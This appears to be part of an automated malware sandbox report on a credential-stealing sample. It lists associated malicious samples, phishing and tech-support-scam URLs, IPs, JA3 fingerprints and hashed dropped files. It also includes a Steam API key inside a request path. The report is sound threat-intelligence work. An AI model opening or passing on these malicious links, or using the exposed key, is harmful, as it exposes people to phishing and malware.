                                                                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                    S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                    • steamcommunity.com/wp-login.php
                                                                                                                                                                                                    5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                    • /IPlayerService/GetSteamLevel/v1/?key=51DA979B9FB5A21B42737CF7DFF0E4D4&steamid=76561198020534850

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    windowsupdatebg.s.llnwi.netSecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    https://mmx1.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-833-289-0083Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    https://smincorporation.com/kr.html#sangdon.yeom@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    https://eNewsletter.cityemployeesclub.com/t/r-l-tiutyult-uklhkkukdd-d/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    http://mitchellind.ubpages.com/mi-ind/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    https://theredhendc.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    http://rakuten.co.jp.rakutle.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    https://llp61.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-883-293-0114Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                    • 69.164.42.0
                                                                                                                                                                                                    fp2e7a.wpc.phicdn.nethttp://185.91.69.110Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    https://site24x7.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    http://bind.bestresulttostart.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    https://45.128.232.135Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    https://windowdefalerts-error0x21906-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                                    steamcommunity.comSecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                    • 23.76.43.59
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 104.67.208.180
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 104.67.208.180
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 23.76.43.59
                                                                                                                                                                                                    https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 23.210.138.105
                                                                                                                                                                                                    dUJqAYctYk.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 23.65.44.84
                                                                                                                                                                                                    ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                    • 104.105.90.131
                                                                                                                                                                                                    ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                    • 104.105.90.131
                                                                                                                                                                                                    Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 104.102.129.112

                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    AKAMAI-ASUS3OcPSlVa7n.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 104.102.70.199
                                                                                                                                                                                                    QFR4Qsnm6y.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 104.78.0.8
                                                                                                                                                                                                    0ZL4A1ojq4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 23.218.112.99
                                                                                                                                                                                                    MY69DoYgp5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 23.7.233.82
                                                                                                                                                                                                    http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 23.79.56.153
                                                                                                                                                                                                    cx9Nvpe3Cs.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 23.13.196.142
                                                                                                                                                                                                    aga94GHd1L.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 23.196.82.129
                                                                                                                                                                                                    16rBksY5gH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 184.86.190.40
                                                                                                                                                                                                    KFGhPSUn9z.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 23.8.92.1
                                                                                                                                                                                                    ALABANZA-BALTUSSecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    QBv5s2bHnV.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 64.176.126.17
                                                                                                                                                                                                    fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 65.108.204.171
                                                                                                                                                                                                    bursocr.exeGet hashmaliciousBlackBastaBrowse
                                                                                                                                                                                                    • 64.176.219.106
                                                                                                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.243.220
                                                                                                                                                                                                    T1LJsPxCGv.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                    • 65.108.26.131
                                                                                                                                                                                                    x4aiDbehKN.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                    • 65.108.24.104
                                                                                                                                                                                                    http://midjourney.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 65.108.78.181

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 65.109.242.73
                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    FACTURA2402616 - BP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    S#U00d6ZLE#U015eME DEV8759 - pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    CONTRACTUL DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216
                                                                                                                                                                                                    1704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                    • 23.4.32.216

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    C:\ProgramData\freebl3.dllLXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                      nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                          Gpeym6icI3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                              dc8laldmc8.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                LB4129B9YX.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    1526RpgCee.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      sLpIvcY3xo.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        C:\ProgramData\mozglue.dllLXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                              Gpeym6icI3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  dc8laldmc8.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    LB4129B9YX.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        1526RpgCee.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          sLpIvcY3xo.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            C:\ProgramData\BKECAEBG

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\FBFCGIDA

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\GCBGIIEC

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\GHDHDGHJ

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\GIDBKKKKKFBGDGDHIDBGHIEBGD

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\HJJJDAEGIDHCBFHJJJEG

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\IDBKFHJEBAAEBGDGDBFBGIEBAA

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\KEHCAFHIJECGCAKFCGDBKEGIDH

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\KFIEHIIIJDAAAAAAKECB

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
